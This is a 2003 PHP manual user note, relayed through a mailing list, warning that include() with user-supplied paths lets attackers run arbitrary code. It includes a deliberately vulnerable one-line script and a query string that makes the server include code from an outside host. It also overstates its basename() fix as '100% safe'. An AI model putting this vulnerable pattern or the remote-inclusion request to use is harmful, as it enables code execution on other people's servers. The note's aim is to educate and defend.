note 29234 added to function.include
| From: | raz0 at NOSPAM dot worldonline dot dk | Date: | Thu, 06 Feb 2003 21:24:42 +0000 |
| Subject: | note 29234 added to function.include | ||
| Groups: | php.notes | ||
| Request: | Send a blank email to php-notes+get-43529@lists.php.net to get a copy of this message | ||
The "Editor's note" to "fekalius at web dot de" post mentions that the code
can be a big security risk. I want to stress that it is a VERY BIG security risk, as a malicious
could send un-parsed PHP code.
Dangerous code could look like this:
include("$file");
Don't think you are safe just because you use:
include("./php/$file.php");
It WILL make it harder to "hack" your script, but NOT impossible.
If you want to be 100% safe, use something similar to this:
if (isset($page) && is_file(basename($page)))
include(basename($page));
If you don't use code similar to the one above, a malicious would be able to use ANY PHP
function. This means that he/she would be able to delete files, create new files, maybe even execute
files etc.
Try creating a new .php file containing the following code...
<?php include($_GET['page']); ?>
... save and upload it. Now run the script in your browser with the following query string:
?page=http://raz0.zalon.dk/safe
eg. http://www.somehost.com/script.php?page=http://raz0.zalon.dk/safe
Hope this helps someone :)
--
http://www.php.net/manual/en/function.include.php
http://master.php.net/manage/user-notes.php?action=edit+29234
http://master.php.net/manage/user-notes.php?action=delete+29234
http://master.php.net/manage/user-notes.php?action=reject+29234